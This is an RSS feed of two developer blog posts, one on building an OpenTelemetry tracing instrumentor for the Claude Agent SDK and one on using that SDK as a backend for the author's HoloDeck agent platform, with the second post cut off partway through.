<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Jeremiah Justin Barias</title>
    <description>The latest articles on DEV Community by Jeremiah Justin Barias (@jeremiahbarias).</description>
    <link>https://dev.to/jeremiahbarias</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3648698%2F59543698-c63b-4cb4-b342-f9924f3ae907.png</url>
      <title>DEV Community: Jeremiah Justin Barias</title>
      <link>https://dev.to/jeremiahbarias</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/jeremiahbarias"/>
    <language>en</language>
    <item>
      <title>I Built an OpenTelemetry Instrumentor for Claude Agent SDK</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Mon, 02 Mar 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/i-built-an-opentelemetry-instrumentor-for-claude-agent-sdk-4e2h</link>
      <guid>https://dev.to/jeremiahbarias/i-built-an-opentelemetry-instrumentor-for-claude-agent-sdk-4e2h</guid>
      <description>&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Background&lt;/li&gt;
&lt;li&gt;The problem&lt;/li&gt;
&lt;li&gt;What I built&lt;/li&gt;
&lt;li&gt;The hooks thing&lt;/li&gt;
&lt;li&gt;Getting started&lt;/li&gt;
&lt;li&gt;What the traces look like&lt;/li&gt;
&lt;li&gt;Rough edges and what's next&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Background
&lt;/h2&gt;

&lt;p&gt;A while back I wrote about &lt;a href="https://justinbarias.io/blog/you-dont-need-another-agent-framework/" rel="noopener noreferrer"&gt;going all-in on Claude Agent SDK for Holodeck&lt;/a&gt;. The short version: I decoupled Holodeck from Semantic Kernel through an abstraction layer, then hooked up Claude Agent SDK as a first-class backend — bash, filesystem, MCP tools, sandboxing, all native.&lt;/p&gt;

&lt;p&gt;That post was about &lt;em&gt;running&lt;/em&gt; agents. This one is about &lt;em&gt;seeing what they're doing once they run&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;With Semantic Kernel, this was a solved problem — it has native OpenTelemetry integration, so you got traces and metrics for free just by wiring up a provider. When I moved to Claude Agent SDK, that didn't exist. So I had to build it myself.&lt;/p&gt;

&lt;h2&gt;
  
  
  The problem
&lt;/h2&gt;

&lt;p&gt;I started running longer agent sessions — multi-turn research tasks, code generation workflows, that kind of thing. And pretty quickly I realized I had no idea what was happening inside them.&lt;/p&gt;

&lt;p&gt;Like, basic stuff:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;How many tokens did a 10-turn conversation actually use?&lt;/li&gt;
&lt;li&gt;Which tool calls are taking forever?&lt;/li&gt;
&lt;li&gt;Did the agent error out on turn 5 and just keep going?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I could grep through logs, sure. But I wanted real traces — the kind where you open Jaeger or Grafana and see a waterfall of what happened, with timing, with parent-child relationships between agent turns and tool calls.&lt;/p&gt;

&lt;p&gt;OpenTelemetry already has &lt;a href="https://opentelemetry.io/docs/specs/semconv/gen-ai/" rel="noopener noreferrer"&gt;GenAI semantic conventions&lt;/a&gt; for exactly this. Nobody had built an instrumentor for the Claude Agent SDK yet. So I did.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I built
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://github.com/justinbarias/opentelemetry-instrumentation-claude-agent-sdk" rel="noopener noreferrer"&gt;&lt;code&gt;opentelemetry-instrumentation-claude-agent-sdk&lt;/code&gt;&lt;/a&gt; — it's a Python package that monkey-patches &lt;code&gt;query()&lt;/code&gt; and &lt;code&gt;ClaudeSDKClient&lt;/code&gt; at runtime. Standard OTel instrumentor pattern, nothing fancy.&lt;/p&gt;

&lt;p&gt;After you call &lt;code&gt;.instrument()&lt;/code&gt;, every agent invocation gets:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An &lt;code&gt;invoke_agent&lt;/code&gt; span with model, token counts (input, output, cache hits), finish reason, conversation ID&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;execute_tool&lt;/code&gt; child spans for each tool call — Bash, Read, Write, MCP tools, whatever&lt;/li&gt;
&lt;li&gt;Histograms for token usage and operation duration&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It follows the GenAI semconv spec, so these traces look like any other LLM provider in your existing dashboards. That was important to me — I didn't want to invent custom attributes that only work with Claude.&lt;/p&gt;

&lt;p&gt;It only depends on &lt;code&gt;opentelemetry-api&lt;/code&gt; and &lt;code&gt;wrapt&lt;/code&gt; at runtime (not the SDK), so if you don't configure a &lt;code&gt;TracerProvider&lt;/code&gt;, it's literally zero overhead — the OTel no-op path handles it.&lt;/p&gt;

&lt;p&gt;Here's what &lt;code&gt;.instrument()&lt;/code&gt; actually does under the hood:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────┐
│ ClaudeAgentSdkInstrumentor.instrument() │
└─────────────────────────────────────────┘
                         │
                         ▼
  Monkey-patches 4 SDK methods via wrapt:

  ┌─────────────────────┐
  │ wrapt.wrap query() │
  │ -&amp;gt; _wrap_query │
  └─────────────────────┘

  ┌────────────────────────────────────────┐
  │ wrapt.wrap ClaudeSDKClient. __init__ () │
  │ -&amp;gt; _wrap_client_init │
  └────────────────────────────────────────┘

  ┌─────────────────────────────────────┐
  │ wrapt.wrap ClaudeSDKClient.query() │
  │ -&amp;gt; _wrap_client_query │
  └─────────────────────────────────────┘

  ┌────────────────────────────────────────────────┐
  │ wrapt.wrap ClaudeSDKClient.receive_response() │
  │ -&amp;gt; _wrap_client_receive_response │
  └────────────────────────────────────────────────┘

                         │
                         ▼
  At call time, wrappers do:

  ┌─────────────────────────────────┐ ┌──────────────────────────────────┐ ┌────────────────────────────────────────────────────┐
  │ _wrap_query (standalone path) │ │ _wrap_client_init │ │ _wrap_client_query + _wrap_client_receive_response │
  │ │ │ │ │ │
  │ 1. inject hooks into options │ │ 1. call original __init__ () │ │ 1. query(): create span, set context │
  │ 2. create invoke_agent span │ │ 2. inject hooks into options │ │ 2. receive_response(): async iterate │
  │ 3. set InvocationContext │ │ 3. store OTel config on instance │ │ - intercept AssistantMessage │
  │ 4. async iterate wrapped() │ │ │ │ - intercept ResultMessage │
  │ - intercept AssistantMessage │ │ │ │ 3. record metrics, end span │
  │ - intercept ResultMessage │ │ │ │ │
  │ 5. record metrics, end span │ │ │ │ │
  └─────────────────────────────────┘ └──────────────────────────────────┘ └────────────────────────────────────────────────────┘

  │
  ▼
  All paths inject hooks into options:

  ┌───────────────────────────────────────────┐
  │ Injected Hooks (via merge_hooks) │
  │ │
  │ PreToolUse -&amp;gt; open execute_tool span │
  │ PostToolUse -&amp;gt; close span (success) │
  │ PostToolUseFail-&amp;gt; close span (error) │
  │ SubagentStart -&amp;gt; (future: subagent span) │
  │ SubagentStop -&amp;gt; (future: close span) │
  └───────────────────────────────────────────┘

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  The hooks thing
&lt;/h2&gt;

&lt;p&gt;This is the part I'm actually proud of.&lt;/p&gt;

&lt;p&gt;The Claude Agent SDK has a hook system — &lt;code&gt;PreToolUse&lt;/code&gt;, &lt;code&gt;PostToolUse&lt;/code&gt;, &lt;code&gt;PostToolUseFailure&lt;/code&gt;, etc. Most people probably ignore them. But they're perfect for instrumentation.&lt;/p&gt;

&lt;p&gt;The naive approach would be to parse tool calls out of the response stream after they finish. That works, but you lose accurate timing, and you can't catch failures cleanly.&lt;/p&gt;

&lt;p&gt;Instead, I register hook callbacks. When a tool starts, &lt;code&gt;PreToolUse&lt;/code&gt; fires and I open a span. When it finishes, &lt;code&gt;PostToolUse&lt;/code&gt; closes it. If it crashes, &lt;code&gt;PostToolUseFailure&lt;/code&gt; closes it with an error. Simple.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;PreToolUse("Bash", tool_use_id="xyz") -&amp;gt; span starts
  ... tool runs ...
PostToolUse("Bash", tool_use_id="xyz") -&amp;gt; span ends

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The tool_use_id lets me correlate start and end events even when multiple tools run. And the hooks are merged &lt;em&gt;after&lt;/em&gt; any hooks you've already set up, so the instrumentation stays out of your way.&lt;/p&gt;

&lt;p&gt;You can also opt into capturing tool arguments and results with &lt;code&gt;capture_content=True&lt;/code&gt;. It's off by default because you probably don't want prompt contents showing up in your trace backend.&lt;/p&gt;

&lt;h2&gt;
  
  
  Getting started
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pip install opentelemetry-instrumentation-claude-agent-sdk[instruments]

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Minimal setup:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import SimpleSpanProcessor, ConsoleSpanExporter
from opentelemetry.instrumentation.claude_agent_sdk import ClaudeAgentSdkInstrumentor

provider = TracerProvider()
provider.add_span_processor(SimpleSpanProcessor(ConsoleSpanExporter()))

ClaudeAgentSdkInstrumentor().instrument(tracer_provider=provider)

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Or if you use &lt;code&gt;opentelemetry-instrument&lt;/code&gt; for auto-instrumentation, it just picks it up — the instrumentor is registered as an entry point.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;opentelemetry-instrument python my_agent_app.py

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two lines if you already have a global TracerProvider:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from opentelemetry.instrumentation.claude_agent_sdk import ClaudeAgentSdkInstrumentor
ClaudeAgentSdkInstrumentor().instrument()

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  What the traces look like
&lt;/h2&gt;

&lt;p&gt;Here's roughly what a multi-turn session looks like in your trace viewer:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;invoke_agent [3.2s, 1847 in / 423 out tokens]
├── execute_tool "Bash" [0.8s]
├── execute_tool "Read" [0.1s]
└── execute_tool "mcp__github" [1.4s, type=extension]

invoke_agent [1.1s, 2103 in / 187 out tokens]
└── execute_tool "Write" [0.05s]

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Both &lt;code&gt;invoke_agent&lt;/code&gt; spans share the same &lt;code&gt;gen_ai.conversation.id&lt;/code&gt;, so you can track a whole session. MCP tools get tagged as &lt;code&gt;type=extension&lt;/code&gt;, built-in ones as &lt;code&gt;type=function&lt;/code&gt; — handy if you want to see how much time your agent spends in external tools vs native ones.&lt;/p&gt;

&lt;p&gt;Here's the &lt;code&gt;invoke_agent&lt;/code&gt; span in the Aspire dashboard — you can see token counts, model, finish reason, and conversation ID all as span attributes:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjzo24pc0aihf39ts2l88.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjzo24pc0aihf39ts2l88.png" alt=" " width="800" height="272"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And drilling into an &lt;code&gt;execute_tool&lt;/code&gt; child span, you get the tool name, type, and the MCP tool path:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpjjgb0nqdfms3ewhdy5u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpjjgb0nqdfms3ewhdy5u.png" alt=" " width="800" height="282"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Rough edges and what's next
&lt;/h2&gt;

&lt;p&gt;This is alpha. It works, I'm using it, but there's stuff I haven't gotten to yet:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Subagent tracking&lt;/strong&gt; — the hooks are wired for &lt;code&gt;SubagentStart&lt;/code&gt;/&lt;code&gt;SubagentStop&lt;/code&gt; but I haven't built the spans yet&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Content capture on agent spans&lt;/strong&gt; — right now &lt;code&gt;capture_content&lt;/code&gt; only covers tool args/results, not the full prompt/response&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It's &lt;a href="https://github.com/justinbarias/opentelemetry-instrumentation-claude-agent-sdk" rel="noopener noreferrer"&gt;MIT-licensed on GitHub&lt;/a&gt;. If you're running Claude agents and want to actually see what they're doing, try it out. If something's broken, &lt;a href="https://github.com/justinbarias/opentelemetry-instrumentation-claude-agent-sdk/issues" rel="noopener noreferrer"&gt;file an issue&lt;/a&gt;.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Previously: &lt;a href="https://justinbarias.io/blog/you-dont-need-another-agent-framework/" rel="noopener noreferrer"&gt;"You Don't Need Any Other Agent Framework"&lt;/a&gt; — where I talked about decoupling Holodeck from Semantic Kernel and hooking up Claude Agent SDK as a first-class backend.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>agents</category>
      <category>llm</category>
      <category>monitoring</category>
      <category>showdev</category>
    </item>
    <item>
      <title>You Don't Need Any Other Agent Framework, You Only Need Claude Agents SDK</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Wed, 25 Feb 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/you-dont-need-any-other-agent-framework-you-only-need-claude-agents-sdk-46n5</link>
      <guid>https://dev.to/jeremiahbarias/you-dont-need-any-other-agent-framework-you-only-need-claude-agents-sdk-46n5</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo6r9hx1mglkeaoykjnsg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo6r9hx1mglkeaoykjnsg.png" alt=" " width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I've spent months building &lt;a href="https://github.com/justinbarias/holodeck" rel="noopener noreferrer"&gt;HoloDeck&lt;/a&gt; — a no-code agent platform where you define agents, tools, evaluations, and deployments in pure YAML. It supports OpenAI, Azure, Ollama via Semantic Kernel. And as of v0.5.0, it supports Claude Agents SDK as a &lt;strong&gt;first-class backend&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Now, here's a hot take: after building both backends side by side, I'm convinced Claude Agents SDK is the only agent framework most developers actually need.&lt;/p&gt;

&lt;p&gt;If you read my &lt;a href="https://justinbarias.io/blog/agentic-memory-filesystem-part-1/" rel="noopener noreferrer"&gt;previous post on bash/filesystem-based agentic systems&lt;/a&gt;, you already know I'm a fan of agents that work &lt;em&gt;with&lt;/em&gt; your tools, not agents that try to &lt;em&gt;replace&lt;/em&gt; them. Claude Agents SDK nails this. It gives you a process with bash, file I/O, MCP tool access, extended thinking, and structured output — out of the box.&lt;/p&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Why Claude Agents SDK&lt;/li&gt;
&lt;li&gt;How HoloDeck Runs Claude Under the Hood&lt;/li&gt;
&lt;li&gt;The Bridges and Adapters I Built&lt;/li&gt;
&lt;li&gt;Custom Tools Are Just MCP Servers&lt;/li&gt;
&lt;li&gt;What's Supported Today&lt;/li&gt;
&lt;li&gt;Security: Sandboxing and Secure Deployment&lt;/li&gt;
&lt;li&gt;Using Claude Agents SDK Without an Anthropic API Key&lt;/li&gt;
&lt;li&gt;Auth: Local Experimentation vs Production&lt;/li&gt;
&lt;li&gt;What's Coming Next&lt;/li&gt;
&lt;li&gt;Wrapping Up&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Why Claude Agents SDK
&lt;/h2&gt;

&lt;p&gt;Most agent frameworks give you a library. You import classes, wire up chains, manage state, and pray that your tool-calling loop doesn't hit an edge case.&lt;/p&gt;

&lt;p&gt;Claude Agents SDK gives you a &lt;strong&gt;process&lt;/strong&gt;. An actual subprocess that:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Has bash access (configurable, with excluded commands)&lt;/li&gt;
&lt;li&gt;Can read, write, and edit files&lt;/li&gt;
&lt;li&gt;Runs MCP tools natively&lt;/li&gt;
&lt;li&gt;Supports extended thinking (deep reasoning with token budgets)&lt;/li&gt;
&lt;li&gt;Returns structured output validated against JSON schemas&lt;/li&gt;
&lt;li&gt;Manages multi-turn sessions with conversation continuity&lt;/li&gt;
&lt;li&gt;Supports subagents for parallel task execution&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This isn't "here's an LLM wrapper with tool use." This is "here's an autonomous coding agent you can point at any problem." The same engine that powers Claude Code, now available as an SDK.&lt;/p&gt;

&lt;p&gt;In my &lt;a href="https://justinbarias.io/blog/agentic-memory-filesystem-part-1/" rel="noopener noreferrer"&gt;previous post&lt;/a&gt;, I talked about how bash + filesystem is the real agentic memory layer — not some vector database, not some custom state manager. Claude Agents SDK is the natural evolution of that idea. The agent &lt;em&gt;is&lt;/em&gt; a process. Its memory &lt;em&gt;is&lt;/em&gt; the filesystem. Its tools &lt;em&gt;are&lt;/em&gt; MCP servers.&lt;/p&gt;




&lt;h2&gt;
  
  
  How HoloDeck Runs Claude Under the Hood
&lt;/h2&gt;

&lt;p&gt;HoloDeck doesn't wrap Claude in some brittle API adapter. It spawns the Claude Agent SDK as a &lt;strong&gt;separate Node.js subprocess&lt;/strong&gt; , then communicates via a structured message protocol. Think of it like running a very smart CLI tool — you send a prompt in, you get structured messages back.&lt;/p&gt;

&lt;p&gt;Here's the architecture:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌──────────────────────────────────────────────────────────────────┐
│                    HoloDeck (Python process)                     │
│                                                                  │
│ ┌───────────────┐  ┌───────────────┐  ┌─────────────────────┐    │
│ │ holodeck test │  │ holodeck chat │  │ holodeck serve (SK) │    │
│ │  (TestExec)   │  │  (ChatSess)   │  │   (future Claude)   │    │
│ └───────────────┘  └───────────────┘  └─────────────────────┘    │
│        │                │                                        │
│        ▼                ▼                                        │
│ ┌─────────────────────────────────────────────────────┐          │
│ │                   BackendSelector                   │          │
│ │ provider: anthropic ────────────────► ClaudeBackend │          │
│ │ provider: openai / azure / ollama ──► SKBackend     │          │
│ └─────────────────────────────────────────────────────┘          │
│                         │                                        │
│                         ▼                                        │
│ ┌──────────────────────────────────────────────────────────────┐ │
│ │                   ClaudeBackend                              │ │
│ │                                                              │ │
│ │ ┌───────────────┐  ┌─────────────┐  ┌──────────────────────┐ │ │
│ │ │ Tool Adapters │  │ MCP Bridge  │  │    OTel Bridge       │ │ │
│ │ │ (in-process   │  │ (external   │  │ (env var translator) │ │ │
│ │ │  MCP server)  │  │  MCP stdio) │  │                      │ │ │
│ │ └───────────────┘  └─────────────┘  └──────────────────────┘ │ │
│ │        │                │                                    │ │
│ │        ▼                ▼                                    │ │
│ │ ┌────────────────────────────────────────────────────┐       │ │
│ │ │ ClaudeAgentOptions                                 │       │ │
│ │ │ {model, system_prompt, mcp_servers, env,           │       │ │
│ │ │  permission_mode, max_turns, allowed_tools, ...}   │       │ │
│ │ └────────────────────────────────────────────────────┘       │ │
│ └──────────────────────────────────────────────────────────────┘ │
└──────────────────────────────────────────────────────────────────┘
                              │
           stdin: AsyncGenerator[prompt]
           stdout: AssistantMessage | UserMessage | ResultMessage
                              │
                              ▼
┌────────────────────────────────────────────────────────┐
│        Claude Agent SDK (Node.js subprocess)           │
│                                                        │
│ ┌────────────────────────────────────────────────────┐ │
│ │ Claude Model (sonnet, opus, haiku, etc.)           │ │
│ │                                                    │ │
│ │ Tools:                                             │ │
│ │  ├── holodeck_tools (in-process MCP server)        │ │
│ │  │    ├── vectorstore_search                       │ │
│ │  │    └── hierarchical_doc_search                  │ │
│ │  ├── external MCP servers (stdio transport)        │ │
│ │  ├── bash (configurable, with excluded commands)   │ │
│ │  ├── file read/write/edit (toggleable)             │ │
│ │  └── web search (optional)                         │ │
│ └────────────────────────────────────────────────────┘ │
└────────────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The key insight: &lt;strong&gt;the Claude subprocess manages its own tool loop&lt;/strong&gt;. HoloDeck doesn't manually orchestrate "call LLM → parse tool call → execute tool → feed result back." The SDK does all of that internally. HoloDeck's job is to:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Assemble the right configuration (tools, auth, observability, system prompt)&lt;/li&gt;
&lt;li&gt;Send the prompt in&lt;/li&gt;
&lt;li&gt;Collect the structured results coming back&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is fundamentally simpler than the Semantic Kernel path where you have to manage &lt;code&gt;ChatHistory&lt;/code&gt;, tool plugins, function call routing, and all the plumbing yourself.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Bridges and Adapters I Built
&lt;/h2&gt;

&lt;p&gt;To make HoloDeck's existing tools and infrastructure work seamlessly with Claude Agents SDK, I built three bridge layers.&lt;/p&gt;

&lt;h3&gt;
  
  
  Tool Adapters (&lt;code&gt;tool_adapters.py&lt;/code&gt;)
&lt;/h3&gt;

&lt;p&gt;HoloDeck has rich tool implementations — &lt;code&gt;VectorStoreTool&lt;/code&gt; for semantic search, &lt;code&gt;HierarchicalDocumentTool&lt;/code&gt; for structure-aware document retrieval with contextual embeddings, hierarchy tracking, and hybrid search. These are Python objects with initialized connections to vector databases, embedding models, and keyword indexes.&lt;/p&gt;

&lt;p&gt;The tool adapters wrap these live Python tool instances as an &lt;strong&gt;in-process MCP server&lt;/strong&gt; that the Claude subprocess can invoke. Each adapter creates &lt;code&gt;@tool&lt;/code&gt;-decorated handler functions with proper JSON schemas, then bundles them into a &lt;code&gt;McpSdkServerConfig&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;VectorStoreTool (Python, initialized with vector DB connection)
        │
        ▼
VectorStoreToolAdapter.to_sdk_tool()
        │
        ▼
@tool("vectorstore_search", schema={...})
async def search(query: str, top_k: int) -&amp;gt; str:
    return await tool_instance.search(query, top_k)
        │
        ▼
build_holodeck_sdk_server()
        │
        ▼
McpSdkServerConfig(name="holodeck_tools", tools=[...])
        │
        ▼
Registered as mcp_servers["holodeck_tools"] in ClaudeAgentOptions

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One subtle but critical detail I had to figure out: the prompt must be sent as an &lt;code&gt;AsyncGenerator&lt;/code&gt; — not a plain string — to keep stdin open for bidirectional MCP communication. A string prompt closes stdin immediately, which kills the in-process MCP server's ability to respond. I learned this the hard way after debugging a &lt;code&gt;ProcessTransport&lt;/code&gt; error for way too long.&lt;/p&gt;

&lt;h3&gt;
  
  
  MCP Bridge (&lt;code&gt;mcp_bridge.py&lt;/code&gt;)
&lt;/h3&gt;

&lt;p&gt;HoloDeck users configure external MCP tools in YAML — database servers, API connectors, custom tooling, whatever. The MCP bridge translates HoloDeck's &lt;code&gt;MCPTool&lt;/code&gt; config format into the &lt;code&gt;McpStdioServerConfig&lt;/code&gt; TypedDicts that Claude Agents SDK expects.&lt;/p&gt;

&lt;p&gt;It handles:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Three-level env var resolution:&lt;/strong&gt; process env → &lt;code&gt;.env&lt;/code&gt; file → explicit YAML overrides&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;${VAR}&lt;/code&gt; substitution&lt;/strong&gt; in config values&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;JSON config blobs&lt;/strong&gt; serialized into &lt;code&gt;MCP_CONFIG&lt;/code&gt; env var for complex tool configuration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Transport filtering&lt;/strong&gt; — Claude subprocess only supports stdio, so SSE/WebSocket/HTTP tools are skipped with a warning&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  OTel Bridge (&lt;code&gt;otel_bridge.py&lt;/code&gt;)
&lt;/h3&gt;

&lt;p&gt;HoloDeck has a comprehensive &lt;code&gt;ObservabilityConfig&lt;/code&gt; Pydantic model for OpenTelemetry — traces, metrics, logs, the works. But the Claude subprocess runs as a separate process, so you can't pass spans or meters across the process boundary. The bridge translates the config into environment variables that the subprocess reads:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;HoloDeck Config&lt;/th&gt;
&lt;th&gt;Subprocess Env Var&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;exporters.otlp.endpoint&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;OTEL_EXPORTER_OTLP_ENDPOINT&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;exporters.otlp.protocol&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;OTEL_EXPORTER_OTLP_PROTOCOL&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;traces.capture_content&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;OTEL_LOG_USER_PROMPTS&lt;/code&gt; + &lt;code&gt;OTEL_LOG_TOOL_DETAILS&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;metrics.export_interval_ms&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;OTEL_METRIC_EXPORT_INTERVAL&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;metrics.enabled&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;OTEL_METRICS_EXPORTER&lt;/code&gt; (&lt;code&gt;"otlp"&lt;/code&gt; or &lt;code&gt;"none"&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Privacy is default-safe — content capture is off unless explicitly enabled. Your prompts and tool details stay private by default.&lt;/p&gt;




&lt;h2&gt;
  
  
  Custom Tools Are Just MCP Servers
&lt;/h2&gt;

&lt;p&gt;This is where the elegance of Claude Agents SDK really shines. When you build &lt;a href="https://platform.claude.com/docs/en/agent-sdk/custom-tools" rel="noopener noreferrer"&gt;custom tools for the SDK&lt;/a&gt;, you're not learning some proprietary plugin API. You're building an MCP server.&lt;/p&gt;

&lt;p&gt;That's it. Your tool is an MCP server. Claude knows how to call MCP servers. The tool gets a name, a JSON schema for its inputs, and a handler function. The SDK packages it as an internal MCP server that the Claude subprocess communicates with via the standard MCP protocol.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from claude_agent_sdk import tool, create_sdk_mcp_server

@tool(name="search_docs", description="Search documentation", schema={...})
async def search_docs(query: str, top_k: int = 5) -&amp;gt; str:
    results = await my_search_engine.search(query, top_k)
    return format_results(results)

server = create_sdk_mcp_server(name="my_tools", tools=[search_docs])

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Tools are testable in isolation&lt;/strong&gt; — they're just functions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tools are reusable&lt;/strong&gt; — any MCP client can call them&lt;/li&gt;
